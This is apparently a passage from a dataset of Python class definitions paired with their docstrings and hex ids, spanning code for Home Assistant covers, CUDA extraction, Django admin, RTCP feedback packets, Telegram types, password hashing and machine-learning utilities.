data, raw_data): <NEW_LINE> <INDENT> if ATTR_CURTAIN_LEVEL in data: <NEW_LINE> <INDENT> self._pos = int(data[ATTR_CURTAIN_LEVEL]) <NEW_LINE> return True <NEW_LINE> <DEDENT> return False | Representation of a XiaomiGenericCover. | 62598fab4e4d5625663723cc |
class NonCancellableAPI(BaseFakeAPI): <NEW_LINE> <INDENT> _job_status = [ {'status': 'RUNNING'}, {'status': 'RUNNING'}, {'status': 'RUNNING'} ] | Class for emulating an API without cancellation running a long job. | 62598fab7d43ff24874273d5 |
class LinuxExtractor(Extractor): <NEW_LINE> <INDENT> def extract(self): <NEW_LINE> <INDENT> if os.path.exists("/tmp/cuda-installer.log"): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.remove("/tmp/cuda-installer.log") <NEW_LINE> <DEDENT> except OSError as e: <NEW_LINE> <INDENT> raise RuntimeError( "Failed to remove /tmp/cuda-installer.log") from e <NEW_LINE> <DEDENT> <DEDENT> print("Extracting on Linux") <NEW_LINE> runfile = self.blob_dir / self.cu_blob <NEW_LINE> os.chmod(runfile, 0o777) <NEW_LINE> with tempdir() as tmpdir: <NEW_LINE> <INDENT> cmd = [ str(runfile), "--silent", "--toolkit", f"--toolkitpath={tmpdir}", "--override" ] <NEW_LINE> subprocess.run(cmd, env=os.environ.copy(), check=True) <NEW_LINE> if os.path.exists("/tmp/cuda-installer.log"): <NEW_LINE> <INDENT> os.remove("/tmp/cuda-installer.log") <NEW_LINE> <DEDENT> toolkitpath = tmpdir <NEW_LINE> if not os.path.isdir(toolkitpath): <NEW_LINE> <INDENT> print('STATUS:',status) <NEW_LINE> for fn in glob.glob('/tmp/cuda_install_*.log'): <NEW_LINE> <INDENT> f = open(fn, 'r') <NEW_LINE> print('-'*100, fn) <NEW_LINE> print(f.read()) <NEW_LINE> print('-'*100) <NEW_LINE> f.close() <NEW_LINE> <DEDENT> os.system('ldd --version') <NEW_LINE> os.system('ls -la %s' % (tmpdir)) <NEW_LINE> raise RuntimeError( 'Something went wrong in executing `{}`: directory `{}` does not exist' .format(' '.join(cmd), toolkitpath)) <NEW_LINE> <DEDENT> self.copy_files(toolkitpath, self.src_dir) <NEW_LINE> <DEDENT> os.remove(runfile) | The Linux Extractor
| 62598fab2c8b7c6e89bd376b |
class RuleSpec(BaseModel): <NEW_LINE> <INDENT> rule = models.CharField(max_length=50, blank=True) <NEW_LINE> name = models.TextField(blank=True) <NEW_LINE> checks = JSONField(default=[], schema=[basestring]) | A rule specification in a classifier. | 62598fab5166f23b2e24337f |
class Segmentation: <NEW_LINE> <INDENT> def __init__(self, file_path, output_path): <NEW_LINE> <INDENT> self.file_path = file_path <NEW_LINE> self.output_path = output_path <NEW_LINE> <DEDENT> def read_file(self): <NEW_LINE> <INDENT> fileTrainRead = [] <NEW_LINE> for txt_name in self.file_path: <NEW_LINE> <INDENT> with open(txt_name, 'r') as fileTrainRaw: <NEW_LINE> <INDENT> for line in fileTrainRaw: <NEW_LINE> <INDENT> fileTrainRead.append(line) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> return fileTrainRead <NEW_LINE> <DEDENT> def segment(self, data): <NEW_LINE> <INDENT> fileTrainSeg=list(jieba.cut(data, cut_all=False)) <NEW_LINE> return fileTrainSeg <NEW_LINE> <DEDENT> def write_file(self, data): <NEW_LINE> <INDENT> with open(self.output_path, 'w') as fW: <NEW_LINE> <INDENT> for i in range(len(data)): <NEW_LINE> <INDENT> fW.write(data[i][0]) <NEW_LINE> fW.write('\n') | 中文分词类 | 62598fab460517430c432030 |
class ToolAdmin(admin.ModelAdmin): <NEW_LINE> <INDENT> form = ToolForm <NEW_LINE> list_display = [ 'name', 'version', 'in_last_update', ] <NEW_LINE> list_filter = [ 'in_last_update', ] <NEW_LINE> ordering = [ 'enabled', 'in_last_update', 'name', 'version', ] <NEW_LINE> readonly_fields = [ 'name', 'version', 'description', 'in_last_update', 'timeout', ] <NEW_LINE> fieldsets = ( ('Tool Information', { 'fields': ( 'name', 'version', 'description', 'in_last_update', 'timeout', ), 'classes': ('wide',), }), ) <NEW_LINE> def refresh_tools_view(self, *args, **kwargs): <NEW_LINE> <INDENT> Tool.objects.all().update(in_last_update=False) <NEW_LINE> ReviewBotExtension.instance.send_refresh_tools() <NEW_LINE> return HttpResponse('ok') <NEW_LINE> <DEDENT> def get_urls(self): <NEW_LINE> <INDENT> urls = super(ToolAdmin, self).get_urls() <NEW_LINE> my_urls = [ url('^refresh/$', self.admin_site.admin_view(self.refresh_tools_view)), ] <NEW_LINE> return my_urls + urls <NEW_LINE> <DEDENT> def has_add_permission(self, request): <NEW_LINE> <INDENT> return False | Admin site definitions for the Tool model. | 62598fab3cc13d1c6d465712 |
class MoeExampleTestCase(T.TestCase): <NEW_LINE> <INDENT> @T.class_setup <NEW_LINE> def create_webapp(self): <NEW_LINE> <INDENT> from moe import main <NEW_LINE> app = main({}, use_mongo='false') <NEW_LINE> from webtest import TestApp <NEW_LINE> self.testapp = TestApp(app) | Base class for testing the moe examples. | 62598fab76e4537e8c3ef554 |
@attr.s <NEW_LINE> class RtcpRtpfbPacket: <NEW_LINE> <INDENT> fmt = attr.ib() <NEW_LINE> ssrc = attr.ib() <NEW_LINE> media_ssrc = attr.ib() <NEW_LINE> lost = attr.ib(default=attr.Factory(list)) <NEW_LINE> def __bytes__(self): <NEW_LINE> <INDENT> payload = pack('!LL', self.ssrc, self.media_ssrc) <NEW_LINE> if self.lost: <NEW_LINE> <INDENT> pid = self.lost[0] <NEW_LINE> blp = 0 <NEW_LINE> for p in self.lost[1:]: <NEW_LINE> <INDENT> d = p - pid - 1 <NEW_LINE> if d < 16: <NEW_LINE> <INDENT> blp |= (1 << d) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> payload += pack('!HH', pid, blp) <NEW_LINE> pid = p <NEW_LINE> blp = 0 <NEW_LINE> <DEDENT> <DEDENT> payload += pack('!HH', pid, blp) <NEW_LINE> <DEDENT> return pack_rtcp_packet(RTCP_RTPFB, self.fmt, payload) <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def parse(cls, data, fmt): <NEW_LINE> <INDENT> ssrc, media_ssrc = unpack('!LL', data[0:8]) <NEW_LINE> lost = [] <NEW_LINE> for pos in range(8, len(data), 4): <NEW_LINE> <INDENT> pid, blp = unpack('!HH', data[pos:pos + 4]) <NEW_LINE> lost.append(pid) <NEW_LINE> for d in range(0, 16): <NEW_LINE> <INDENT> if (blp >> d) & 1: <NEW_LINE> <INDENT> lost.append(pid + d + 1) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> return cls(fmt=fmt, ssrc=ssrc, media_ssrc=media_ssrc, lost=lost) | Generic RTP Feedback Message (RFC 4585). | 62598fab5fdd1c0f98e5df3d |
class Rule(KLCRule): <NEW_LINE> <INDENT> def __init__(self, component): <NEW_LINE> <INDENT> super(Rule, self).__init__(component, 'Rule 3.2', 'For black-box symbols, pins have a length of 100mils. Large pin numbers can be accommodated by incrementing the width in steps of 50mil.') <NEW_LINE> <DEDENT> def check(self): <NEW_LINE> <INDENT> self.violating_pins = [] <NEW_LINE> for pin in self.component.pins: <NEW_LINE> <INDENT> length = int(pin['length']) <NEW_LINE> if length == 0: continue <NEW_LINE> if (length < 100) or (length % 50 != 0): <NEW_LINE> <INDENT> self.violating_pins.append(pin) <NEW_LINE> self.verboseOut(Verbosity.HIGH, Severity.ERROR, 'pin: {0} ({1}), {2}'.format(pin['name'], pin['num'], positionFormater(pin))) <NEW_LINE> <DEDENT> <DEDENT> return True if len(self.violating_pins) > 0 else False <NEW_LINE> <DEDENT> def fix(self): <NEW_LINE> <INDENT> self.verboseOut(Verbosity.NORMAL, Severity.INFO, "FIX: not yet supported" ) | Create the methods check and fix to use with the kicad lib files. | 62598fab99fddb7c1ca62dbc |
class ChannelParticipantCreator(TLObject):
    """Attributes:
        LAYER: ``112``
        ID: ``0x808d15a4``

    Parameters:
        user_id: ``int`` ``32-bit``
        rank (optional): ``str``
    """

    __slots__ = ["user_id", "rank"]

    ID = 0x808d15a4
    QUALNAME = "types.ChannelParticipantCreator"

    def __init__(self, *, user_id: int, rank: str = None):
        self.user_id = user_id
        self.rank = rank

    @staticmethod
    def read(b: BytesIO, *args) -> "ChannelParticipantCreator":
        """Deserialize from a TL byte stream."""
        flags = Int.read(b)
        user_id = Int.read(b)
        # Flag bit 0 marks the presence of the optional rank string.
        rank = String.read(b) if flags & (1 << 0) else None
        return ChannelParticipantCreator(user_id=user_id, rank=rank)

    def write(self) -> bytes:
        """Serialize to TL wire format."""
        buffer = BytesIO()
        buffer.write(Int(self.ID, False))
        flags = (1 << 0) if self.rank is not None else 0
        buffer.write(Int(flags))
        buffer.write(Int(self.user_id))
        if self.rank is not None:
            buffer.write(String(self.rank))
        return buffer.getvalue()
LAYER: ``112``
Attributes:
ID: ``0x808d15a4``
Parameters:
user_id: ``int`` ``32-bit``
rank (optional): ``str`` | 62598fab99cbb53fe6830e7e |
class Solution:
    """Find the lowest common ancestor (LCA) of two nodes in a binary tree.

    @param: root: The root of the binary search tree.
    @param: A: A TreeNode in a Binary.
    @param: B: A TreeNode in a Binary.
    @return: Return the least common ancestor(LCA) of the two nodes.
    """

    def lowestCommonAncestor(self, root, A, B):
        ancestor, _, _ = self.helper(root, A, B)
        return ancestor

    def helper(self, root, A, B):
        # Returns (lca-or-None, subtree-contains-A, subtree-contains-B).
        if root is None:
            return None, False, False
        left_lca, left_has_a, left_has_b = self.helper(root.left, A, B)
        if left_lca:
            # LCA already found deeper on the left; propagate it up.
            return left_lca, True, True
        right_lca, right_has_a, right_has_b = self.helper(root.right, A, B)
        if right_lca:
            return right_lca, True, True
        has_a = left_has_a or right_has_a or root is A
        has_b = left_has_b or right_has_b or root is B
        # This node is the LCA exactly when both targets appear below
        # (or at) it and no deeper LCA was found.
        return (root if has_a and has_b else None), has_a, has_b
@param: A: A TreeNode in a Binary.
@param: B: A TreeNode in a Binary.
@return: Return the least common ancestor(LCA) of the two nodes. | 62598fab7c178a314d78d444 |
class NSNitroNserrInvalnodeid(NSNitroBaseErrors):
    """Nitro error code 362: invalid node ID specified."""
    pass
Invalid node ID specified | 62598fab851cf427c66b8263 |
class DeleteImageCachesResponse(AbstractModel):
    """DeleteImageCaches response structure."""

    def __init__(self):
        # Unique id of the API request; populated by _deserialize.
        self.RequestId = None

    def _deserialize(self, params):
        """Fill fields from the response parameter dict."""
        self.RequestId = params.get("RequestId")
| 62598fabf548e778e596b54b |
class CompiledSource(object):
    """Compile a source string with PyCUDA, caching the resulting module
    so compilation happens at most once."""

    def __init__(self, src, kernel_name):
        self.src = src
        self.kernel_name = kernel_name
        self.module = None
        self.kernel = None

    def __call__(self, *args, **kw):
        """Invoke the kernel, compiling lazily on first use."""
        if self.module is None:
            util.log('Compiling... %s', self.kernel_name)
            self.module = SourceModule(self.src)
            self.kernel = self.module.get_function(self.kernel_name)
        self.kernel(*args, **kw)
        # Block until the kernel has finished executing.
        driver.Context.synchronize()
class MnistDatabase(Database):
    """MNIST database backed by a cached ``fgnt_mnist.npz`` archive.

    >>> db = MnistDatabase()
    >>> db.get_dataset('test')[0]['image'].shape
    (28, 28)
    >>> db.get_dataset('test')[0]['digit']
    7
    """

    def __repr__(self):
        return f'{type(self).__name__}()'

    @cached_property.cached_property
    def data(self):
        # Download once into the user cache directory; afterwards always
        # load from the compressed archive on disk.
        from appdirs import user_cache_dir
        archive = Path(user_cache_dir('padercontrib')) / 'fgnt_mnist.npz'
        if not archive.exists():
            archive.parent.mkdir(parents=True, exist_ok=True)
            downloaded = download(verbose=False)
            np.savez_compressed(archive, **downloaded)
        npz = np.load(str(archive))
        contents = dict(npz)
        npz.close()
        return construct_json(contents)
>>> db.get_dataset('train')
DictDataset(name='train', len=60000)
MapDataset(_pickle.loads)
>>> db.get_dataset('test')
DictDataset(name='test', len=10000)
MapDataset(_pickle.loads)
>>> db.get_dataset('test')[0]['image'].shape
(28, 28)
>>> db.get_dataset('test')[0]['digit']
7
>>> type(db.get_dataset('test')[0]['digit'])
<class 'int'> | 62598fab66656f66f7d5a397 |
class SparkDataSources(object):
    """SparkDataSources wrapper class.

    Wraps a mapping of id -> Spark DataFrame and can convert it into the
    JVM-side ``SparkDataSources`` object.
    """

    def __init__(self, idDfMapping=None):
        # Fix: the original used a mutable default argument (``dict()``),
        # which would be shared across all instances created without an
        # explicit mapping.
        super(SparkDataSources, self).__init__()
        self._idDfMapping = {} if idDfMapping is None else idDfMapping

    def to_java_object(self):
        """Build the JVM ``SparkDataSources`` from the id->DataFrame map."""
        jvm = _jvm()
        pairs = [jvm.scala.Tuple2(key, df._jdf)
                 for key, df in list(self._idDfMapping.items())]
        scala_list = jvm.com.ibm.analytics.wml.pipeline.pythonbinding.Helper.javaToScalaList(pairs)
        return jvm.com.ibm.analytics.wml.pipeline.spark.SparkDataSources(
            jvm.com.ibm.analytics.wml.pipeline.pythonbinding.Helper.scalaListOfPairsToMap(scala_list))
class RevisionMismatchError(ArangoRequestError):
    """Raised on a mismatch between expected and actual revision."""
    pass
class Hasher:
    """A class that knows how to hash.

    Stores defaults for every hashing parameter; :meth:`hash` falls back
    to those defaults for any argument the caller leaves as the ``VOID``
    sentinel.  (The original repeated an ``isinstance(..., Void)`` check
    per parameter; that fallback is now factored into ``_fallback``.)
    """

    __slots__ = [
        'additional_data', 'backend', 'hash_len', 'iterations', 'lanes',
        'memory_size', 'salt', 'secret_key', 'threads', 'variant', 'version'
    ]

    def __init__(
            self, *,
            secret_key: Union[bytes, str, None],
            additional_data: Union[bytes, str, None] = None,
            backend: Backend = DEFAULT_BACKEND,
            hash_len: int = DEFAULT_HASH_LEN,
            iterations: int = DEFAULT_ITERATIONS,
            lanes: int = DEFAULT_LANES,
            memory_size: int = DEFAULT_MEMORY_SIZE,
            salt: Union[bytes, RandomSalt, str] = DEFAULT_SALT,
            threads: int = DEFAULT_THREADS,
            variant: Variant = DEFAULT_VARIANT,
            version: Version = DEFAULT_VERSION
    ) -> None:
        self.additional_data = additional_data
        self.salt = salt
        self.secret_key = secret_key
        self.backend = backend
        self.hash_len = hash_len
        self.iterations = iterations
        self.lanes = lanes
        self.memory_size = memory_size
        self.threads = threads
        self.variant = variant
        self.version = version

    def _fallback(self, name: str, value):
        """Return ``value``, or the instance default stored under ``name``
        when ``value`` is the VOID sentinel."""
        return getattr(self, name) if isinstance(value, Void) else value

    def hash(
            self, *,
            password: Union[bytes, str],
            additional_data: Union[bytes, str, None, Void] = VOID,
            backend: Union[Backend, Void] = VOID,
            hash_len: Union[int, Void] = VOID,
            iterations: Union[int, Void] = VOID,
            lanes: Union[int, Void] = VOID,
            memory_size: Union[int, Void] = VOID,
            salt: Union[bytes, RandomSalt, str, Void] = VOID,
            secret_key: Union[bytes, str, None, Void] = VOID,
            threads: Union[int, Void] = VOID,
            variant: Union[Variant, Void] = VOID,
            version: Union[Version, Void] = VOID
    ) -> str:
        """Hash ``password``; all other parameters default to the values
        configured on this instance unless explicitly overridden."""
        overrides = {
            'additional_data': additional_data,
            'backend': backend,
            'hash_len': hash_len,
            'iterations': iterations,
            'lanes': lanes,
            'memory_size': memory_size,
            'salt': salt,
            'secret_key': secret_key,
            'threads': threads,
            'variant': variant,
            'version': version,
        }
        resolved = {name: self._fallback(name, value)
                    for name, value in overrides.items()}
        # ``hash`` here is the module-level hashing function, not the builtin.
        return hash(password=password, **resolved)
class MetricTree(Metric):
    """A tree structure which has a node :class:`Metric` and some children.

    Upon execution, the node is called with the input and its output is
    passed to each of the children. A dict is updated with the results.

    :param metric: The metric to act as the root node of the tree / subtree
    :type metric: Metric
    """

    def __init__(self, metric):
        super(MetricTree, self).__init__(metric.name)
        self.root = metric
        self.children = []

    def add_child(self, child):
        """Attach a subtree that consumes the root metric's output."""
        self.children.append(child)

    def _for_tree(self, function, *args):
        # Apply ``function`` to the root, then to each child with the
        # root's output; merge all non-None child result dicts.
        merged = {}
        root_output = function(self.root, *args)
        for subtree in self.children:
            child_result = function(subtree, root_output)
            if child_result is not None:
                merged.update(child_result)
        return merged

    def process(self, *args):
        return self._for_tree(
            lambda metric, *in_args: metric.process(*in_args), *args)

    def process_final(self, *args):
        return self._for_tree(
            lambda metric, *in_args: metric.process_final(*in_args), *args)

    def eval(self):
        self.root.eval()
        for subtree in self.children:
            subtree.eval()

    def train(self):
        self.root.train()
        for subtree in self.children:
            subtree.train()

    def reset(self, state):
        self.root.reset(state)
        for subtree in self.children:
            subtree.reset(state)
input and its output is passed to each of the children. A dict is updated with the results.
:param metric: The metric to act as the root node of the tree / subtree
:type metric: Metric | 62598fab8c0ade5d55dc3665 |
class BoundedArraySpec(ArraySpec):
    """An `ArraySpec` that specifies minimum and maximum values.

    Example usage:

    ```python
    # Same minimum and maximum for every element.
    spec = BoundedArraySpec((3, 4), np.float64, minimum=0.0, maximum=1.0)
    # A different minimum and maximum for each element.
    spec = BoundedArraySpec(
        (2,), np.float64, minimum=[0.1, 0.2], maximum=[0.9, 0.9])
    ```

    Bounds are inclusive, which matters for integer types: a spec with
    minimum=0 and maximum=2 is satisfied by values in {0, 1, 2}.
    """

    __slots__ = ('_minimum', '_maximum')

    def __init__(self, shape, dtype, minimum, maximum, name=None):
        super(BoundedArraySpec, self).__init__(shape, dtype, name)
        self._minimum = minimum
        self._maximum = maximum

    @property
    def minimum(self):
        return self._minimum

    @property
    def maximum(self):
        return self._maximum

    def __repr__(self):
        template = ('BoundedArraySpec(shape={}, dtype={}, name={}, '
                    'minimum={}, maximum={})')
        return template.format(self.shape, repr(self.dtype), repr(self.name),
                               self._minimum, self._maximum)

    def __eq__(self, other):
        if not isinstance(other, BoundedArraySpec):
            return False
        # NOTE(review): assumes bounds support elementwise `==` followed
        # by `.all()` (array-like) — confirm behavior for scalar bounds.
        return (super(BoundedArraySpec, self).__eq__(other)
                and (self.minimum == other.minimum).all()
                and (self.maximum == other.maximum).all())

    def validate(self, value):
        """Raise via ``_fail_validation`` unless all values are in bounds."""
        value = np.asarray(value)
        super(BoundedArraySpec, self).validate(value)
        if (value < self.minimum).any() or (value > self.maximum).any():
            self._fail_validation(
                'Values were not all within bounds %s <= value <= %s',
                self.minimum, self.maximum)

    def generate_value(self):
        """Return an array filled with the minimum valid value."""
        return (np.ones(shape=self.shape, dtype=self.dtype) *
                self.dtype.type(self.minimum))
Example usage:
```python
# Specifying the same minimum and maximum for every element.
spec = BoundedArraySpec((3, 4), np.float64, minimum=0.0, maximum=1.0)
# Specifying a different minimum and maximum for each element.
spec = BoundedArraySpec(
(2,), np.float64, minimum=[0.1, 0.2], maximum=[0.9, 0.9])
# Specifying the same minimum and a different maximum for each element.
spec = BoundedArraySpec(
(3,), np.float64, minimum=-10.0, maximum=[4.0, 5.0, 3.0])
```
Bounds are meant to be inclusive. This is especially important for
integer types. The following spec will be satisfied by arrays
with values in the set {0, 1, 2}:
```python
spec = BoundedArraySpec((3, 4), np.int, minimum=0, maximum=2)
``` | 62598fab4a966d76dd5eee88 |
class ControllerTests(unittest.TestCase):
    """Unit tests for the Controller class."""

    def test_controller_tick(self):
        """tick() returns falsy for a controller built from mocked parts."""
        self.pump = Pump('127.0.0.1', 8000)
        self.pump.set_state = MagicMock(return_value=True)
        self.pump.get_state = MagicMock(return_value="PUMP_IN")
        self.sensor = Sensor('127.0.0.1', 8000)
        self.sensor.measure = MagicMock(return_value=20)
        self.decider = Decider(100, 10)
        self.controller = Controller(self.sensor, self.pump, self.decider)
        assert not self.controller.tick()
class FeatureChart(Chart):
    """A Chart for feature grammars.

    :see: ``Chart`` for more information.
    """

    def select(self, **restrictions):
        """Return an iterator over edges matching ``restrictions``."""
        # With no restrictions, iterate over every edge.
        if restrictions == {}:
            return iter(self._edges)
        restr_keys = tuple(sorted(restrictions.keys()))
        # Build the index on demand the first time this key set is used.
        if restr_keys not in self._indexes:
            self._add_index(restr_keys)
        vals = tuple(self._get_type_if_possible(restrictions[key])
                     for key in restr_keys)
        return iter(self._indexes[restr_keys].get(vals, []))

    def _add_index(self, restr_keys):
        """Create an index over the given restriction keys and back-fill
        it with all existing edges."""
        # Each restriction key must name an EdgeI accessor method.
        for key in restr_keys:
            if not hasattr(EdgeI, key):
                raise ValueError("Bad restriction: %s" % key)
        index = self._indexes[restr_keys] = {}
        for edge in self._edges:
            vals = tuple(self._get_type_if_possible(getattr(edge, key)())
                         for key in restr_keys)
            index.setdefault(vals, []).append(edge)

    def _register_with_indexes(self, edge):
        """Record a newly added edge in every existing index."""
        for (restr_keys, index) in self._indexes.items():
            vals = tuple(self._get_type_if_possible(getattr(edge, key)())
                         for key in restr_keys)
            index.setdefault(vals, []).append(edge)

    def _get_type_if_possible(self, item):
        # Feature structures are indexed by their TYPE feature.
        if isinstance(item, dict) and TYPE in item:
            return item[TYPE]
        else:
            return item

    def parses(self, start, tree_class=Tree):
        """Yield complete parse trees whose LHS unifies with ``start``."""
        for edge in self.select(start=0, end=self._num_leaves):
            if ((isinstance(edge, FeatureTreeEdge))
                    and (edge.lhs()[TYPE] == start[TYPE])
                    and (unify(edge.lhs(), start, rename_vars=True))):
                yield from self.trees(edge, complete=True,
                                      tree_class=tree_class)
:see: ``Chart`` for more information. | 62598fab1b99ca400228f503 |
class GaussianNoiseAnnealing(Callback):
    """Add annealed Gaussian noise to the gradients before each step.

    At iteration ``t`` the noise is drawn from ``N(0, sigma_t^2)`` with
    variance ``sigma_t^2 = eta / (1 + t) ** gamma``, so the noise decays
    towards zero over training.

    # References:
        - Adding Gradient Noise Improves Learning for Very Deep Networks
        - https://arxiv.org/abs/1511.06807

    :param parameters: parameters whose gradients receive noise.
    :param eta: scale of the initial noise variance.
    :param gamma: decay rate of the variance schedule.
    """

    def __init__(self, parameters, eta=0.3, gamma=0.55):
        self._parameters = parameters
        self._eta = eta
        self._gamma = gamma
        super(GaussianNoiseAnnealing, self).__init__()

    def before_step(self):
        """Perturb every gradient in place with annealed Gaussian noise."""
        # The schedule gives the noise *variance*; the standard normal
        # draw must therefore be scaled by sqrt(variance).  (The previous
        # code multiplied by the variance itself.)
        variance = self._eta / ((1 + self._iteration) ** self._gamma)
        std = variance ** 0.5
        for param in self._parameters:
            noise = torch.randn(param.grad.shape,
                                device=param.grad.device) * std
            param.grad.add_(noise)
Add gaussian noise to the gradients with the given mean & std. The std will
decrease at each batch up to 0.
# References:
- Adding Gradient Noise Improves Learning for Very Deep Networks
- https://arxiv.org/abs/1511.06807
:param eta: TODO
:param gamma: Decay rate. | 62598fabbd1bec0571e15097 |
class AvgScore():
    """Calculate average scores; input can be a single value or a list.

    Not using numpy, so may be much slower than a numpy version; now
    mainly used for tensorflow testers.
    """

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear all accumulated state."""
        self.num_steps = 0
        self.total_score = 0.
        self.total_scores = None

    def add(self, score):
        """Accumulate one scalar score or one list of scores."""
        if isinstance(score, list):
            if self.total_scores is None:
                self.total_scores = score
            else:
                # Element-wise running sum for list inputs.
                self.total_scores = [a + b for a, b in
                                     zip(self.total_scores, score)]
        else:
            self.total_score += score
        self.num_steps += 1

    def avg_score(self):
        """Return the average accumulated so far, then reset the state."""
        if self.total_scores is None:
            result = self.total_score / self.num_steps
        else:
            result = [total / self.num_steps for total in self.total_scores]
        self.reset()
        return result
Not using numpy, so may be much slower then numpy version, now mainly used for tensorflow testers | 62598fab851cf427c66b8264 |
class IsAdmin(BasePermission):
    """Allows access only to admin users."""

    def has_permission(self, request, view):
        # Authenticated admin users only; truthiness chain matches the
        # DRF permission contract.
        user = request.user
        return user and user.is_authenticated and user.is_admin
@dataclass
class AvanzaFondDAO(BaseDao):
    """The DAO for interesting information about a fund from
    Fond Marknaden."""

    id: int
    name: str
    description: str
    NAV: str
    changeSinceOneMonth: str
    changeSinceThreeMonths: str
    prospectus: str
    tradingCurrency: str
class FATFS(FS):
    """FAT (vfat) filesystem."""

    _type = "vfat"
    _modules = ["vfat"]
    _labelfs = fslabeling.FATFSLabeling()
    _supported = True
    _formattable = True
    _max_size = Size("1 TiB")
    _packages = ["dosfstools"]
    _fsck_class = fsck.DosFSCK
    _mkfs_class = fsmkfs.FATFSMkfs
    _mount_class = fsmount.FATFSMount
    _readlabel_class = fsreadlabel.DosFSReadLabel
    _writelabel_class = fswritelabel.DosFSWriteLabel
    # Fraction of raw size usable after metadata overhead.
    _metadata_size_factor = 0.99
    parted_system = fileSystemType["fat16"]
class GdocsCrawlerController:
    """GdocsCrawlerController
    ----------
    A controller for the GdocsCrawler.
    It takes care of validating the events that the GdocsCrawler returns,
    adds them to the database if they are valid and not duplicates of
    events already parsed.
    """

    gdc = GdocsCrawler
    _event_list = []
    _event_index_list = []
    _event_id_list = []

    def __init__(self):
        self.gdc = GdocsCrawler()

    @property
    def event_list(self):
        return self._event_list

    def load_new_events_list(self):
        """Load the spreadsheet indices of events not yet imported."""
        self._event_index_list = self.gdc.new_events_indices
        self.populate_event_list_from_index_list()

    def load_updated_events_list(self):
        """Load indices and database ids of events flagged as updated."""
        self._event_index_list, self._event_id_list = zip(
            *self.gdc.updated_events_indices_and_ids)
        self.populate_event_list_from_index_list()

    def populate_event_list_from_index_list(self):
        """Rebuild the event list from the currently stored indices."""
        self._event_list = [self.gdc.get_nth_event(index)
                            for index in self._event_index_list]

    def cleanup_event_list(self):
        """Drop duplicate events, keeping the index list in sync."""
        self._event_list, self._event_index_list = zip(
            *SimpleDeduplicator.remove_duplicates_from_event_list(
                zip(self._event_list, self._event_index_list)))

    def add_events_to_database(self):
        """Persist non-duplicate events, write their ids back to the
        sheet, and attach each event's categories."""
        for i, sheet_index in enumerate(self._event_index_list):
            event = self._event_list[i]
            if not SimpleDeduplicator.is_duplicate(event):
                event.save()
                self.gdc.write_id_nth_event(sheet_index, event.id)
                self._event_id_list.append(event.id)
            for category in self.gdc.get_categories_nth_element(sheet_index):
                assert isinstance(category, Category)
                event.category.add(category)

    def update_events_in_database(self):
        """Apply changed fields to stored events and clear the sheet's
        update flag for each."""
        for i, event_id in enumerate(self._event_id_list):
            sheet_index = self._event_index_list[i]
            stored = Event.objects.get(id=event_id)
            # NOTE(review): ``get`` normally returns a single object, not a
            # sequence — confirm this indexing is intentional.
            stored = stored[0]
            new_event = self._event_list[i]
            changes = stored.compare(new_event)
            for (name, value) in changes:
                setattr(stored, name, value)
            stored.save(update_fields=[name for (name, _) in changes])
            self.gdc.write_update_status_nth_event(sheet_index, False)
----------
A controller for the GdocsCrawler.
It takes care of validating the events that the GdocsCrawler returns,
adds them to the database if they are valid and not duplicates of
events already parsed. | 62598fac090684286d5936b0 |
class STS(RegressionTask):
    """Semantic Textual Similarity."""

    def __init__(self, config: configure_finetuning.FinetuningConfig,
                 tokenizer):
        # STS-B scores range over [0.0, 5.0].
        super(STS, self).__init__(config, "sts", tokenizer, 0.0, 5.0)

    def _create_examples(self, lines, split):
        examples = []
        if split == "test":
            # Test TSVs carry no label column.
            examples += self._load_glue(lines, split, -2, -1, None, True)
        else:
            examples += self._load_glue(lines, split, -3, -2, -1, True)
        if self.config.double_unordered and split == "train":
            # Load the training pairs a second time with offset ids —
            # presumably with swapped sentence order; controlled by the
            # double_unordered flag.
            examples += self._load_glue(
                lines, split, -3, -2, -1, True, len(examples), True)
        return examples
class WAR_Card(cards.Card):
    """A card valued for the game of Blackjack.

    Face-down cards have no value; ranks above 10 all count as 10.
    """

    ACE_VALUE = 1

    @property
    def value(self):
        if not self.is_face_up:
            return None
        rank_value = WAR_Card.RANKS.index(self.rank) + 1
        # Face cards (J/Q/K) cap at 10.
        return min(rank_value, 10)
class Tracking(lyrebird.PluginView):
    """Tracking plugin view: serves the UI page and the REST endpoints."""

    def index(self):
        """Render the plugin main page."""
        return self.render_template('index.html')

    def get_result(self):
        """Return all collected tracking results."""
        return jsonify({'result': app_context.result_list})

    def get_content(self, id=''):
        """Return detailed content for one id, or HTTP 400 if unknown."""
        for item in app_context.content:
            if item['id'] == id:
                return jsonify(item)
        return abort(400, 'Request not found')

    def save_report(self):
        """Write the current data into the report template and copy the
        template tree into the plugin storage directory."""
        report_data_path = os.path.join(
            os.path.dirname(__file__), 'report_template/data/report-data.js')
        with codecs.open(report_data_path, 'w+', 'utf-8') as f:
            f.write('var reportCaseData=' + json.dumps(
                {'result': app_context.result_list}, ensure_ascii=False) + '\n')
            f.write('var baseData=' + json.dumps(
                app_context.config, ensure_ascii=False) + '\n')
            f.write('var detailCollection=' + json.dumps(
                app_context.content, ensure_ascii=False) + '\n')
        report_path = os.path.join(os.path.dirname(__file__),
                                   'report_template')
        target_path = os.path.abspath(
            os.path.join(lyrebird.get_plugin_storage(), 'report'))
        # copytree requires the destination not to exist yet.
        if os.path.exists(target_path):
            shutil.rmtree(target_path)
        shutil.copytree(report_path, target_path)
        return context.make_ok_response()

    def clear_result(self):
        """Reset collected data and notify connected clients."""
        app_context.result_list = []
        app_context.content = []
        tracking_init()
        context.application.socket_io.emit(
            'update', namespace='/tracking-plugin')
        return context.make_ok_response()

    def get_base_info(self):
        """Return the plugin configuration."""
        return jsonify(app_context.config)

    def groups(self):
        """Return the currently selected groups."""
        return jsonify(app_context.select_groups)

    def select(self):
        """Store the group selection posted by the client."""
        app_context.select_groups = request.json.get('group')
        return context.make_ok_response()

    def on_create(self):
        """Register template root and all URL routes."""
        tracking_init()
        self.set_template_root('lyrebird_tracking')
        self.add_url_rule('/', view_func=self.index)
        self.add_url_rule('/result', view_func=self.get_result)
        self.add_url_rule('/content/<string:id>', view_func=self.get_content)
        self.add_url_rule('/report', view_func=self.save_report)
        self.add_url_rule('/clear', view_func=self.clear_result)
        self.add_url_rule('/base', view_func=self.get_base_info)
        self.add_url_rule('/group', view_func=self.groups)
